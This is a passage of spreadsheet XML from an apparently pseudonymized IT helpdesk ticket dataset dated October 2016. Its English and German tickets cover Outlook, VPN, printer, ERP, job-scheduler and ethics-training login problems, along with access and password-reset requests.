    <t>plm-engineering tool:  pdf-files can not be opened. error attached.</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
received from: tgafnyzb.hnevrcuj@gmail.com_x000D_
_x000D_
hallo,_x000D_
_x000D_
das Ã¶ffnen von pdf-files aus engineering tool dauert heute extrem lange. manchmal erscheint auch diese meldung, ohne dass das file geÃ¶ffnet wird:_x000D_
_x000D_
[cid:image001.png@01SID_35e3f.829dfa90]_x000D_
_x000D_
mit freundlichen grÃ¼ÃŸen / best </t>
  </si>
  <si>
    <t>tgafnyzb hnevrcuj</t>
  </si>
  <si>
    <t>info type '0017' is missing to personal number 56567040</t>
  </si>
  <si>
    <t xml:space="preserve">from: qkmvosen opundxsk 
sent: tuesday, october 04, 2016 4:10 pm
to: nyifqpmv kfirxjag
subject: travel expense manager
hello,
transaktion  pr05 doesnÂ´t work for personal number 56567040.
please check.
</t>
  </si>
  <si>
    <t>qkmvosen opundxsk</t>
  </si>
  <si>
    <t>probleme mit ie \vzqomdgt jwoqbuml</t>
  </si>
  <si>
    <t>sinic allgemeiner fehler: 3155 odbc vmsliazh ltksxmyv driver abfragetimeout \jionmpsf wnkpzcmv</t>
  </si>
  <si>
    <t>probleme mit drucker we110 \fdyietau dvsyxwbu</t>
  </si>
  <si>
    <t xml:space="preserve">hallo ,_x000D_
_x000D_
unser kopierer im schulungsraum ist auch defekt (minolta we 110)._x000D_
_x000D_
kannst du bitte mal nachschauen._x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">job Job_593 failed in job_scheduler at: 10/04/2016 06:08:00  </t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
job Job_593 failed in job_scheduler at: 10/04/2016 06:08:00</t>
  </si>
  <si>
    <t>urgent help required, i cant link an appointment to an account. i have the crm tab on outlook, but when i enter an appointment and go to set regarding and put in the account, nothing comes to the account for an appointment.</t>
  </si>
  <si>
    <t>qmpobijv wamtbupd</t>
  </si>
  <si>
    <t xml:space="preserve">job Job_1355 failed in job_scheduler at: 10/04/2016 05:48:00  </t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
job Job_1355 failed in job_scheduler at: 10/04/2016 05:48:00</t>
  </si>
  <si>
    <t>outlook issues - does not pull /send emails - delay up to 1 hour</t>
  </si>
  <si>
    <t xml:space="preserve">login: peathryucoj1
i have issues with my emails in outlook today. 
there are delays with pulling emails and sending out.
i am getting my emails with almost an hour delay.
i also have issues with sending out my emails. 
they are hanging in my outbox for a long time until they finally go out.
</t>
  </si>
  <si>
    <t>i cannot pick calls up from my phone</t>
  </si>
  <si>
    <t>ebhl8111120 does not ring when there is a call.</t>
  </si>
  <si>
    <t>npfkbdxo vdyltfzx</t>
  </si>
  <si>
    <t>infopath is not working.</t>
  </si>
  <si>
    <t>sxhcapoe kbluefip</t>
  </si>
  <si>
    <t>account locked. password reset request.</t>
  </si>
  <si>
    <t>need access to \\891245132\scan</t>
  </si>
  <si>
    <t xml:space="preserve">
zugriff auf verzeichnis angefragt.
folder access requested.
benutzer id ?
user id ?ahujajtyhur
benutzer die position titel?
user's position title ?executive sales admin
verzeichnis? 
folder ?\\891245132\scan
art des zugriffs?
type of access ? (read only or full control) ?full
name des vorgesetzten?
manager name?cobsfvjz apkqmrdu
received from: ohdrnswl.rezuibdt@gmail.com
hi,
please help to assign scanner to my system 891245132.
best </t>
  </si>
  <si>
    <t xml:space="preserve">need your help!! </t>
  </si>
  <si>
    <t xml:space="preserve">
received from: ezwcpqrh.bnwqaglk@gmail.com
hello it desk,
i sent this emal thru the web mail, as i can not open the ms office outrlook, due to the error message below.
the error message says " cannot create new gard page of stack."   as of things, i just changed my pass word recently with accordance to the auto notification from system.
please help me to solve this trouble quickly and start to use outlook for my daily work.
my email address is
ezwcpqrh.bnwqaglk@gmail.com
id is
yathryu
mobile phone is
your asistance is highly appreciated.
best </t>
  </si>
  <si>
    <t>ezwcpqrh bnwqaglk</t>
  </si>
  <si>
    <t>7350 wifi not connecting</t>
  </si>
  <si>
    <t>gtrspvoq dbkuhjvf</t>
  </si>
  <si>
    <t>crm- extensions - forecast view</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
received from: ctzykflo.evzbhgru@gmail.com_x000D_
_x000D_
dear all,_x000D_
_x000D_
under crm â€“ extensions â€“ the "forecast" button is gone. instead we have now "potential spends" . can someone please readd the "forecast"._x000D_
_x000D_
[cid:image001.png@01SID_35e2d.85e00b60]_x000D_
</t>
  </si>
  <si>
    <t>app probleme</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
received from: ecoljnvt.lbdqmvfs@gmail.com_x000D_
_x000D_
hallo kollegen,_x000D_
_x000D_
in meinem outlook kommt ein feld dass ein app â€“ problem vorhanden ist._x000D_
_x000D_
was ist zu tun?_x000D_
_x000D_
[cid:image003.jpg@01SID_35e28.2c1d0470]_x000D_
_x000D_
mit freundlichen grÃ¼ÃŸen / best </t>
  </si>
  <si>
    <t>please provide the following:_x000D_
_x000D_
what order number? 5019296276/00001_x000D_
_x000D_
what material or item number? 7380698_x000D_
_x000D_
what warehouse location?  plant_108_x000D_
_x000D_
issue description / error message? no---</t>
  </si>
  <si>
    <t>mvwiygou rpkscnlv</t>
  </si>
  <si>
    <t>unable to do ethics course. have not received a mail from ethics since a very long time.</t>
  </si>
  <si>
    <t xml:space="preserve">mr. kothyherr has not received any mail from ethics since a long time. he thinks he should have received at least 2-3 mails during this period. that is why he is unable to do the course. 
he insists ethics to look into it.
received from: ecoljnvt.lbdqmvfs@gmail.com
hallo kollegen,
ich sollte eigentlich meine ethics vorgÃ¤nge abarbeiten.
dazu habe ich jedoch keinerlei erinnerungsinformationen bekommen noch einen link wie ich in das portal komme.
deswegen habe ich versucht Ã¼ber hub in das portal zu kommen.
dazu habe ich auf login  gedrÃ¼ckt!
[cid:image005.jpg@01SID_35e26.0dda3340]
dann auf den button deutsch.
[cid:image006.jpg@01SID_35e26.0dda3340]
dann kommt jedoch keine offene session!
was ist zu tun?
mit freundlichen grÃ¼ÃŸen / best </t>
  </si>
  <si>
    <t>frequent account locked out</t>
  </si>
  <si>
    <t>gxawkhsq xqrczonv</t>
  </si>
  <si>
    <t>prognose crm - forecast to plan dashbankrd not working - resource not found error</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
received from: ctzykflo.evzbhgru@gmail.com_x000D_
_x000D_
dear all,_x000D_
_x000D_
not only the one user is affected we got other sales reps indicating that they can't open the crm forecast to plan dashbankrd and get the "resource not found error"._x000D_
_x000D_
</t>
  </si>
  <si>
    <t>outlook is not updating.</t>
  </si>
  <si>
    <t>pltkqrfd bfohnjmz</t>
  </si>
  <si>
    <t xml:space="preserve">job Job_2645 failed in job_scheduler at: 10/04/2016 03:25:00  </t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
job Job_2645 failed in job_scheduler at: 10/04/2016 03:25:00</t>
  </si>
  <si>
    <t>i am still unable to "salesperson" and "uacyltoe hxgaycze performed by" in engineering_tool.could you help me?</t>
  </si>
  <si>
    <t xml:space="preserve">name:alparslanthyr
language:
browser:microsoft internet explorer
email:lanigpkq.qzhakunx@gmail.com
customer number:
telephone:
summary:hello,
i am still unable to "salesperson" and "uacyltoe hxgaycze performed by" in engineering_tool.could you help me?
</t>
  </si>
  <si>
    <t>lanigpkq qzhakunx</t>
  </si>
  <si>
    <t>not able to login to ethics portal_ kxmidsga zokivdfa</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
received from: kxmidsga.zokivdfa@gmail.com_x000D_
_x000D_
dear sir,_x000D_
i am not able to login to ethics portal. the error screen shot attached below._x000D_
kindly do the need full._x000D_
_x000D_
_x000D_
[cid:image001.jpg@01SID_35e3c.6cd364f0]_x000D_
_x000D_
_x000D_
_x000D_
with best </t>
  </si>
  <si>
    <t>please provide access to m drive</t>
  </si>
  <si>
    <t xml:space="preserve">
received from: dshferby.houtnzdi@gmail.com
dear it team,
good morning.
please provide full control access to below paths, for the below members (markhtyed cc).
departments (\\HostName_95&lt;file:///\\HostName_95&gt;) (m:)\k100 scorecard_india iscl
departments (\\HostName_95&lt;file:///\\HostName_95&gt;) (m:)\k100 updates_india iscl
sagfhoshgzpkmilu skwbuvjyheelavant santthyumar.shtyhant@company.com&lt;mailto:santthyumar.shtyhant@company.com&gt;
 fahdlecz ubcszaohygexqab.cvihupnk@gmail.com&lt;mailto:cygexqab.cvihupnk@gmail.com&gt;
 erathyur dbrugslc.ydwtsunh@gmail.com&lt;mailto:dbrugslc.ydwtsunh@gmail.com&gt;
ihkolepb ozhnjyef ihkolepb.ozhnjyef@gmail.com&lt;mailto:ihkolepb.ozhnjyef@gmail.com&gt;
njdxwpvg.onlehdsi@gmail.com&lt;mailto:njdxwpvg.onlehdsi@gmail.com&gt;
culixwse pmrvxbnjhivaramdntyaiah wkzrenmj.vsyctbzk@gmail.com&lt;mailto:wkzrenmj.vsyctbzk@gmail.com&gt;
</t>
  </si>
  <si>
    <t>issue with bobj</t>
  </si>
  <si>
    <t xml:space="preserve">dear all,_x000D_
_x000D_
can you please fix the bobj problem for mjvfxnka zvjxuahe. see below error message._x000D_
_x000D_
</t>
  </si>
  <si>
    <t>mjvfxnka zvjxuahe</t>
  </si>
  <si>
    <t>problems with wifi</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
received from: hpeknoam.yrfowmva@gmail.com_x000D_
_x000D_
good morning,_x000D_
_x000D_
i use my dell latitude 7350 in my home office using my own wifi network for internet access._x000D_
often when i wake it up from powersave mode it is still connected to my local wifi network, but as a â€žnot identified" network with no internet connection. my private owned devices (pc, smartphone,tablet) still work fine._x000D_
i have to shut down and restart the dell again to get a proper connection._x000D_
_x000D_
please advise what to do, as restarting the dell a couple of times over the day is annoying and time kirtyling._x000D_
_x000D_
best </t>
  </si>
  <si>
    <t>hpeknoam yrfowmva</t>
  </si>
  <si>
    <t>timecards access in ticketing_tool</t>
  </si>
  <si>
    <t xml:space="preserve">i have noticed that i don't have access to timecards in my ticketing_tool. can i have it enabled? </t>
  </si>
  <si>
    <t>gpabsizh txldupyk</t>
  </si>
  <si>
    <t xml:space="preserve">job HostName_1019failagain failed in job_scheduler at: 10/04/2016 02:31:00  </t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
job HostName_1019failagain failed in job_scheduler at: 10/04/2016 02:31:00</t>
  </si>
  <si>
    <t>pgi for delivery note 9169475765 not possible</t>
  </si>
  <si>
    <t xml:space="preserve">pgi for delivery note 9169475765 not possible -&gt; please see enclosed message_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>tvmlrwkz rsxftjep</t>
  </si>
  <si>
    <t xml:space="preserve">job HostName_1019fail failed in job_scheduler at: 10/04/2016 02:21:00  </t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
job HostName_1019fail failed in job_scheduler at: 10/04/2016 02:21:00</t>
  </si>
  <si>
    <t>savwzktn huqxbfot</t>
  </si>
  <si>
    <t>kann sich nicht anmelden</t>
  </si>
  <si>
    <t>bwafcjmt wutqczgh</t>
  </si>
  <si>
    <t>do i have to worry about this?</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
received from: hbmwlprq.ilfvyodx@gmail.com_x000D_
_x000D_
[cid:image001.png@01SID_35e17.ad30bfe0]_x000D_
_x000D_
mit freundlichem gruÃŸ / kind </t>
  </si>
  <si>
    <t>unable to login to HostName_589 vsphere client.</t>
  </si>
  <si>
    <t>unable to login to HostName_589 vsphere client._x000D_
vmware virtualcenter server service is in stopped state.</t>
  </si>
  <si>
    <t>zgemhkby lgwkstcb</t>
  </si>
  <si>
    <t>material specification code</t>
  </si>
  <si>
    <t>the material code trn-hdt-kmc026 is available in the erp system, but when selecting it in engineering tool, there is an error ... no material code exists</t>
  </si>
  <si>
    <t>plm7 enterprise search for engineering records not working</t>
  </si>
  <si>
    <t xml:space="preserve">hello, since a while the plm7 enterprise search for engineering records is not working on my pc. a plugin is missing according to the error messages in the status bar. see attachments._x000D_
</t>
  </si>
  <si>
    <t>request to reset microsoft online services password for tyhufrey.thyel@company.com</t>
  </si>
  <si>
    <t xml:space="preserve">   request to reset user's password   
   the following user in your organization has requested a password reset be performed for their account: 
â€¢ tyhufrey.thyel@company.com 
â€¢ first name: tyhufrey 
â€¢ last name: thyel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
  </si>
  <si>
    <t>oebrjdqc nhuqmskw</t>
  </si>
  <si>
    <t xml:space="preserve">job Job_1329 failed in job_scheduler at: 10/04/2016 00:50:00  </t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
job Job_1329 failed in job_scheduler at: 10/04/2016 00:50:00</t>
  </si>
  <si>
    <t>vh 27 - werk germany - fehlende druckauftrÃ¤ge  - eilt monatswechsel!!!</t>
  </si>
  <si>
    <t>_x000D_
bei drucker vh 27 keine ausgabe der druckauftrÃ¤ge aus erp-hrp. druck aus word/excel funktioniert._x000D_
drucker wurde bereits ausgeschaltet und neu gestartet ohne erfolg!_x000D_
_x000D_
_x000D_
_x000D_
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_x000D_
 _x000D_
   â€¢  detailed description of the problem ?_x000D_
_x000D_
   â€¢  type of documents not printing?  (email â€“ excel â€“ wordâ€¦etc) _x000D_
      (inwarehouse_tool â€“ delivery note â€“ production orderâ€¦etc)_x000D_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</si>
  <si>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ethics_application not found</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
received from: vfoyenlw.ntpbdeyf@gmail.com_x000D_
_x000D_
hello,_x000D_
_x000D_
i am not able to open the ethics training course._x000D_
_x000D_
please see the below error screenshot._x000D_
_x000D_
[cid:image009.jpg@01SID_35e24.ec8a53b0]_x000D_
_x000D_
with </t>
  </si>
  <si>
    <t>ethics login issue</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
received from: ohdrnswl.rezuibdt@gmail.com_x000D_
_x000D_
hi,_x000D_
_x000D_
please see highlighted error and resolve it on urgent basis._x000D_
_x000D_
[cid:image001.png@01SID_35e21.0bf7a9e0]_x000D_
_x000D_
best </t>
  </si>
  <si>
    <t>unable to login to ethics training course</t>
  </si>
  <si>
    <t>hi, when i'm trying to login to ethics training course, i get the web page as unregistered user. please can you help in this.</t>
  </si>
  <si>
    <t>issue playing courage change win video</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
received from: saerpwno.qsdfmakc@gmail.com_x000D_
_x000D_
hello,_x000D_
_x000D_
can you please help me with this message which i got when i tried to open the lauacyltoe hxgaycze video on "courage change win"_x000D_
_x000D_
[cid:image001.jpg@01SID_35e1d.9b7d2300]_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>saerpwno qsdfmakc</t>
  </si>
  <si>
    <t>unable to print from wy33 printer</t>
  </si>
  <si>
    <t xml:space="preserve">unable to print from wy33 printer
_________________________________
ic
 welcome, our next available agent will be with you shortly...
 interaction alerting agent.
 website visitor has joined the conversation
dwfiykeo argtxmvcumar3
 hello
zheqafyo bqirpxag
 hi, good moryctrhbkm plvnuxmrnoj
 i could not print in wy33 printer.. i am in india
zheqafyo bqirpxag
 hi, are you there?
dwfiykeo argtxmvcumar3
 yes
zheqafyo bqirpxag
 this problem happens every month,
dwfiykeo argtxmvcumar3
 ok, let me check with local it
 where are you right now, in which deppt?
</t>
  </si>
  <si>
    <t>install lauacyltoe hxgaycze version of flash player</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
received from: saerpwno.qsdfmakc@gmail.com_x000D_
_x000D_
hello,_x000D_
_x000D_
can you please install the lauacyltoe hxgaycze version of flash player on my system? i got this message (which is shown below) while i tried to complete the ethics course on our collaboration_platform site._x000D_
_x000D_
[cid:image001.jpg@01SID_35e1b.fb25e280]_x000D_
_x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">job pp_EU_tool_netch_keheu2 failed in job_scheduler at: 10/03/2016 23:06:00  </t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
job pp_EU_tool_netch_keheu2 failed in job_scheduler at: 10/03/2016 23:06:00</t>
  </si>
  <si>
    <t>SID_51 password</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
received from: qycgdfhz.iqshzdru@gmail.com_x000D_
_x000D_
hi,_x000D_
_x000D_
please reset my password for SID_51 to daypay3._x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>qycgdfhz iqshzdru</t>
  </si>
  <si>
    <t>erp performances this morning via vpn germany</t>
  </si>
  <si>
    <t xml:space="preserve">
received from: blktuiae.jzakfmhw@gmail.com
hi it
i started an report this  morning and it takes  normal 10 minute to get the result
current the report ist still running after 35 minutes
do we have a performance issue with erp
my user id is:  wethruiberg
</t>
  </si>
  <si>
    <t>blktuiae jzakfmhw</t>
  </si>
  <si>
    <t>collaboration_platform site is not opening</t>
  </si>
  <si>
    <t>changes in ad</t>
  </si>
  <si>
    <t xml:space="preserve">hi, there,_x000D_
my reporting line in the outlook organization system is wrong. i have been relocated from usa to apac and now report to vlpfgjyz dvzrfsbo. my title is sr. engineer, r&amp;d which is not reflected in the system too. please help to correct. </t>
  </si>
  <si>
    <t>ywbnzxud qzwrynux</t>
  </si>
  <si>
    <t>flash player version</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
received from: elixsfvu.pxwbjofl@gmail.com_x000D_
_x000D_
hi,_x000D_
_x000D_
please help to assist the following issue._x000D_
_x000D_
</t>
  </si>
  <si>
    <t>i can't log into the vpn or ticketing_tool. i changed my password this morning and now it is not working</t>
  </si>
  <si>
    <t xml:space="preserve">from: dartnl porwrloisky [mailto:mreocsnk.swoyxzma@gmail.com] 
sent: monday, october 03, 2016 11:35 pm
to: nwfodmhc exurcwkm
subject: rakthyesh login problems with vpn
hi.
i can't log into the vpn or ticketing_tool. i changed my password this morning and now it is not working
can you please reset my login?
my username is poloidgthyl
i keep getting this error:
danl poloisky
territory manager
m (330) 260-5038
f  (330) 343-4705
mreocsnk.swoyxzma@gmail.com
| 2605 federal signal dr | usa, il 60484 |      
</t>
  </si>
  <si>
    <t>summary:when i run wip list and try to do my report i get run time error 1004.pivot table field name not valid.</t>
  </si>
  <si>
    <t>issues with crm dynamics</t>
  </si>
  <si>
    <t xml:space="preserve">issues with crm dynamics. need permissions. while opening records user is getting error record is unavailable. the request record was not found or you do not have sufficient permissions to view it._x000D_
</t>
  </si>
  <si>
    <t>my account will expire soon, please help to extend vvwhtyuy account for one year.. / user : vvwhtyuy / manager name: mikdhyu lihy</t>
  </si>
  <si>
    <t>do not receive information</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
received from: duoyrpvi.wgjpviul@gmail.com_x000D_
_x000D_
hi team,_x000D_
_x000D_
i originally enquiries about this at the start of august and nothing has been amended._x000D_
_x000D_
currently i do not receive any email notifications for the likes of ethics/ethical moments/sipppr's._x000D_
_x000D_
and now i have tried to log into ethics via collaboration_platform and received the following error message:_x000D_
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can you please assist aerp in setting up these notifications._x000D_
_x000D_
</t>
  </si>
  <si>
    <t>kicked off of vpn</t>
  </si>
  <si>
    <t xml:space="preserve">i was kicked off of vpn for the 3rd time today at about 5:45pm.  </t>
  </si>
  <si>
    <t xml:space="preserve">potential security issue with the ios 10 update </t>
  </si>
  <si>
    <t>cyxieuwk rekwlqmu</t>
  </si>
  <si>
    <t xml:space="preserve">outlook error </t>
  </si>
  <si>
    <t>pgrqbizd tolwefig</t>
  </si>
  <si>
    <t>urgent help required-outlook to crm mfg_tooltion issue</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
received from: fjohugzb.fhagjskd@gmail.com_x000D_
_x000D_
helloâ€¦_x000D_
_x000D_
there is no crm tab in my outlook ribbon, please advise._x000D_
_x000D_
_x000D_
[cid:image001.jpg@01SID_35d92.SID_2628051]_x000D_
_x000D_
_x000D_
_x000D_
fjohugzb fhagjskd_x000D_
sr. channel partner specialist_x000D_
company inc._x000D_
fjohugzb.fhagjskd@gmail.com&lt;mailto:fjohugzb.fhagjskd@gmail.com&gt;_x000D_
p 800-446-7738 (office)_x000D_
m 705-760-3495_x000D_
technical support 800-835-3668_x000D_
na-company.techsupport@company.com_x000D_
www.company.com&lt;_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>unable to connect to wireless</t>
  </si>
  <si>
    <t xml:space="preserve">user called in for an issue where he was not able to connect to any wireless network. he's using the dell 7350 tablet device. </t>
  </si>
  <si>
    <t>unable to update new password on iphone</t>
  </si>
  <si>
    <t>unable to update passwords for all accounts</t>
  </si>
  <si>
    <t>network outage : cantabria (mecftgobusa) site hard down since 2:53 pm et on 10/03.</t>
  </si>
  <si>
    <t>what type of outage:  __x___network     _____circuit     _____power (please specify what type of outage)_x000D_
_x000D_
1. top 23 cert site   ?    _____no____     (yes/no/na) _x000D_
_x000D_
2. when did it start  ?   __________ 2:53 pm et on 10/03.____________x000D_
_x000D_
3.  scheduled maintenance ( power) ? ___no___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____na____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</si>
  <si>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ethics training</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
received from: rolcgqhx.ehndjmlv@gmail.com_x000D_
_x000D_
hello, i started ethics training, it became stuck on page 7_x000D_
please contact me aerp_x000D_
_x000D_
best </t>
  </si>
  <si>
    <t>unable to open/edit expense report for employee</t>
  </si>
  <si>
    <t>cannot log in</t>
  </si>
  <si>
    <t xml:space="preserve">
received from: zwirhcol.narzlmfw@gmail.com
marty nevins username nevinmw cannot login to a computer.
j. shrugott tyhuellis
usa facilities mgr.
zwirhcol.narzlmfw@gmail.com&lt;mailto:zwirhcol.narzlmfw@gmail.com&gt;
</t>
  </si>
  <si>
    <t>zwirhcol narzlmfw</t>
  </si>
  <si>
    <t>unable to safe attachment on erp</t>
  </si>
  <si>
    <t xml:space="preserve">when i try to safe a file to a sales order in erp i received the fallowing error _x000D_
an error occurred when uploading to erp knowledge_x000D_
provider._x000D_
</t>
  </si>
  <si>
    <t>zwqveghb rxdmstng</t>
  </si>
  <si>
    <t>sales history not correct in apo (dp)</t>
  </si>
  <si>
    <t xml:space="preserve">
received from: koqntham.sqiuctfl@gmail.com
jochgthen / it team,
there appears to be an issue with the history in apo. only the september history looks correct.
[cid:image003.jpg@01SID_35SID_25.6236c930]
</t>
  </si>
  <si>
    <t xml:space="preserve">job Job_3194 failed in job_scheduler at: 10/03/2016 14:15:00  </t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
job Job_3194 failed in job_scheduler at: 10/03/2016 14:15:00</t>
  </si>
  <si>
    <t>external site not loading</t>
  </si>
  <si>
    <t>crm in outlook not working // grethyg</t>
  </si>
  <si>
    <t>syclwnxe jhgdesun</t>
  </si>
  <si>
    <t>rtpmlwnk unpambrv</t>
  </si>
  <si>
    <t>kvqtzayg ehjrviak</t>
  </si>
  <si>
    <t>getting knocked off vpn</t>
  </si>
  <si>
    <t>was knocked off vpn about 1:10pm et today and then again about 1:45pm et.  i have a problem with being knocked off almost every day.</t>
  </si>
  <si>
    <t>all of my purchasing suppliers in the us are stated as do not use.</t>
  </si>
  <si>
    <t>my purchasing catalogs are no longer there. when i try and re-select them all the us supplier say, do not use</t>
  </si>
  <si>
    <t>xwyrvcbj bmqfszjg</t>
  </si>
  <si>
    <t>my vpn dropped twice this morning and twice since lunch</t>
  </si>
  <si>
    <t>unable to enter an estimated value in opportunities in ms crm</t>
  </si>
  <si>
    <t>wanyrjkg tsycmeof</t>
  </si>
  <si>
    <t>unable to sign in to outlook</t>
  </si>
  <si>
    <t>jmusidzr sratdeol</t>
  </si>
  <si>
    <t>reset windows password for all accounts</t>
  </si>
  <si>
    <t>ycazngpi mdsqixlr</t>
  </si>
  <si>
    <t>unable to login to erp</t>
  </si>
  <si>
    <t>printing request - request transaction print to a different printer.  please contact omiwzbue auvolfhp for info.</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</si>
  <si>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prtqv0072 &amp; prtqv0001_x000D_
 _x000D_
   â€¢  detailed description of the problem ?_x000D_
_x000D_
   â€¢  type of documents not printing?  (email â€“ excel â€“ wordâ€¦etc) _x000D_
      (inwarehouse_tool â€“ delivery note â€“ production orderâ€¦etc)_x000D_
erp_x000D_
   â€¢  what system or application being used at time of the problem?      (ex windows / erp /kls)_x000D_
erp / windows_x000D_
   â€¢  if not printing at all, does it respond to a ping command on the network and has a power cycle of the printer been completed?_x000D_
_x000D_
   â€¢  if erp system, which system?   (ex SID_34 / SID_38 / hrp / plm)SID_34_x000D_
_x000D_
      â€¢  if it's an erp printer problem can the erp output be rerouted to another erp printer temporarily?_x000D_
         what printer can it be rerouted too? currently qv01 is being routed to qv72. _x000D_
qv01 is now fixed and i need all erp jobs to print on qv01 not qv72._x000D_
_x000D_
   â€¢  if document is not printing correctly, please scan copy of the document and attach to the ticketing_tool ticket</t>
  </si>
  <si>
    <t>omiwzbue auvolfhp</t>
  </si>
  <si>
    <t>password change</t>
  </si>
  <si>
    <t>oqzgvkrh jiylqwtc</t>
  </si>
  <si>
    <t>tqemuawj mvcqrbaz</t>
  </si>
  <si>
    <t>i have old version ethics training on my account, please help me. thank you</t>
  </si>
  <si>
    <t xml:space="preserve">i have old version ethics training on my account, please help me. </t>
  </si>
  <si>
    <t>kzusmblv lnkbxdst</t>
  </si>
  <si>
    <t>map i drive</t>
  </si>
  <si>
    <t>cifgxham iuzefkha</t>
  </si>
  <si>
    <t>crm not synching mails</t>
  </si>
  <si>
    <t>vpn / erp log out</t>
  </si>
  <si>
    <t xml:space="preserve">
received from: mnlvhtug.imvetgoa@gmail.com
this is getting tiresome being logged out of vpn automatically while working on erp.
cant seem to get much done if i have to keep logging back on.
this needs to be fixed..
[cid:image001.jpg@01SID_35d77.bb454b00]
mnlvhtug imvetgoa
sr. application engineer
general engineering
company inc.
mnlvhtug.imvetgoa@gmail.com&lt;mailto:mnlvhtug.imvetgoa@gmail.com&gt;
[cid:image001.png@01d15842.000812f0]
</t>
  </si>
  <si>
    <t xml:space="preserve">user wish to set lan as first priority for internet </t>
  </si>
  <si>
    <t xml:space="preserve">user wish to set lan as first priority for internet  but my laptop makes wireless first priority and disconnect from lan and connect to wireless
pc name: ldvl8517832
</t>
  </si>
  <si>
    <t>external caller asking for vtykrubi whsipqno's email address</t>
  </si>
  <si>
    <t>unable to open an website</t>
  </si>
  <si>
    <t>wzbqmhdf gxsiadqw</t>
  </si>
  <si>
    <t>unlock erp SID_34 account</t>
  </si>
  <si>
    <t>vydbqise wkjrmxqh</t>
  </si>
  <si>
    <t>help to install - engineering_tool to other peoples (no-company)</t>
  </si>
  <si>
    <t>hi team, 
i need your help, we have a people than isn't employee company, but needed install engineering_tool in a computer. they're client company, he has id (ccfterguss) to acces site  engineering_tool, but in hour that install appears the error in attachment, do you have a instructions to install in computers no-company.</t>
  </si>
  <si>
    <t>monitor on wire pc is out.</t>
  </si>
  <si>
    <t>leyvdwjt biaklozn</t>
  </si>
  <si>
    <t>unable to find name as sales person in engineering tool</t>
  </si>
  <si>
    <t xml:space="preserve">unable to find name as sales person in engineering tool. 
phone: </t>
  </si>
  <si>
    <t>gxibtzek fgkpqjsb</t>
  </si>
  <si>
    <t xml:space="preserve">usa plant : all the switches and servers are down at the site at 11:45 am et on 10/03. </t>
  </si>
  <si>
    <t>internet is down</t>
  </si>
  <si>
    <t xml:space="preserve">lwgytuxq qspdztiw called in for an issue where the internet is completely down and they are unable to access internet, erp and all other applications.
contact no - </t>
  </si>
  <si>
    <t>outlook calendar shatryung</t>
  </si>
  <si>
    <t xml:space="preserve">
received from: gdnwlkit.jokidavy@gmail.com
tried to share my calendar in outlook with my manager, rick orelli, and got this error message
[cid:image001.png@01SID_35SID_28.edb479b0]
biintll tujutnis
senior sales engineer wc1 team
gdnwlkit.jokidavy@gmail.com&lt;mailto:gdnwlkit.jokidavy@gmail.com&gt;
www.company.com&lt;
</t>
  </si>
  <si>
    <t xml:space="preserve">quotes in workflow </t>
  </si>
  <si>
    <t xml:space="preserve">from: wjslkzfr jxlbzwrp _x000D_
sent: monday, october 03, 2016 7:50 pm_x000D_
to: nwfodmhc exurcwkm_x000D_
subject: re: quotes in workflow _x000D_
_x000D_
hi , _x000D_
_x000D_
i have 2 items in workflow that i am unable to save out. it appears the quote was deleted._x000D_
3116211904 lines 110 and 120_x000D_
please help me get these saved out._x000D_
_x000D_
</t>
  </si>
  <si>
    <t>unable to open outlook after changing password</t>
  </si>
  <si>
    <t>name:ksgytjqr ojdukgzc
language:
browser:microsoft internet explorer
email:ksgytjqr.ojdukgzc@gmail.com
customer number:
telephone:
summary:can't sign into skype</t>
  </si>
  <si>
    <t>ksgytjqr ojdukgzc</t>
  </si>
  <si>
    <t>ethics</t>
  </si>
  <si>
    <t xml:space="preserve">
received from: soujqrxw.mvwduljx@gmail.com
i have made several attempts to access ethics training and it doesn't connect.
soujqrxw mvwduljx
company, inc.
sales engineer, usa.
cell 
soujqrxw.mvwduljx@gmail.com&lt;mailto:soujqrxw.mvwduljx@gmail.com&gt;
customer service   ftmill.service@company.com&lt;mailto:ftmill.service@company.com&gt;
product support 8  na-company.techsupport@company.com&lt;mailto:na-company.techsupport@company.com&gt;
</t>
  </si>
  <si>
    <t>soujqrxw mvwduljx</t>
  </si>
  <si>
    <t>7350 - no audio device</t>
  </si>
  <si>
    <t>no audio device on the pc, failed to play uacyltoe hxgaycze tone.</t>
  </si>
  <si>
    <t>vpn issues</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
received from: uvorgwts.mlqzaicb@gmail.com_x000D_
_x000D_
hello i.t. team,_x000D_
_x000D_
my vpn will not accept my username and password. please contact me at your earliest convenience._x000D_
_x000D_
best </t>
  </si>
  <si>
